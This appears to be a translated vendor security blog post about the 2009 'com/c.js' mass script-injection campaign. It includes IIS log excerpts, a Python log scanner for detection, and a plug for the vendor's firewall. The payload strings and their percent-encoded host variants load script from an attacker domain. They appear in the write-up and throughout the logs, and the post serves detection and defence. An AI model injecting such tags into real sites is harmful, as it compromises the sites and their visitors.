A Complete Solution for the com/c.js Script-Injection (挂马) Attack

Recently a new kind of script-injection ("挂马") engine has started to appear. A Google search for com/c.js turns up roughly 16,200 websites that have been injected.

After investigation by 安全伞, the findings are as follows:

The injection engine uses web-crawling to submit its injection code over and over; the payload is mainly %D3%AA%D1%F8<script%20src=http://3bomb.%63%6Fm/c.js></script>

The middle part (the host name) keeps mutating, for example:

<script%20src=http://3b%6F%6Dbcom/c.js></script>

<script%20src=http://%33bomb.com/c.js></script>

The IIS logs look like this:

2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0 0

2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/0a5d18e3-3018-47a2-ac57-99909ce5c58a.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/new_34528523.jpg - 80 - 116.5.162.127 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/510be59b-07fd-4868-87b7-d3cbc677f3a7.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/2e60e9fe-1fa1-495d-8a64-d21a73ec1099.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/221d7e7d-2e21-4cb2-a496-1c7627f200f9.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/10364b4a-5dde-4d6d-a9e7-17efaf3983d4.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0

2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0 0

The trojan injects its script tag through Cookie, GET and POST parameters, and uses search engines to find target websites and inject them automatically, so it behaves somewhat like a worm.
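The log entries above show why a plain string match for 3bomb.com misses most of these requests: the host name is hidden behind single and double percent-encoding (%6F, %256F, %33). The following detector, an added example that is not part of the original post or of 安全伞, decodes each URI stem and query until the encoding stops changing and then looks for an injected external script tag; it assumes the default W3C IIS field order and takes the watchlist host from the post.

```python
import re
from urllib.parse import unquote_plus

# Sample W3C-format IIS log lines, a constructed subset of the entries quoted in the post.
SAMPLE_LOG = """\
2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 200 0 0
2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0 0
"""

# Matches an injected external script tag and captures its host, tolerating
# missing quotes, a missing scheme and the malformed "http:/" with one slash.
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?\s*(?:https?:)?/*([^/\"'\s>]+)", re.IGNORECASE
)


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the text stops changing, so that nested encodings
    such as %256F (-> %6F -> 'o') and '+' for space all collapse to plain text."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value, errors="replace")
        if decoded == value:
            break
        value = decoded
    return value


def scan_iis_log(log_text: str, watchlist=("3bomb.com",)):
    """Return one finding per injected <script src=...> found in the URI stem or
    query of each W3C IIS log line (assumed default field order, 14 fields)."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if not fields or line.startswith("#") or len(fields) < 10:
            continue
        for part, raw in (("uri-stem", fields[5]), ("uri-query", fields[6])):
            for host in SCRIPT_TAG.findall(decode_fully(raw)):
                findings.append({
                    "time": f"{fields[0]} {fields[1]}",
                    "client_ip": fields[9],
                    "part": part,
                    "host": host.lower(),
                    "known_bad": host.lower() in watchlist,
                })
    return findings
```

Any finding with known_bad set to False still deserves a look, since the post notes the host string keeps changing between submissions.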

安全伞 2009 Enterprise Edition can effectively block this kind of disguised injection.

Official download: http://safe3wp.safe3.com.cn/download.htm

Original article: https://www.cnblogs.com/Safe3/p/1379590.html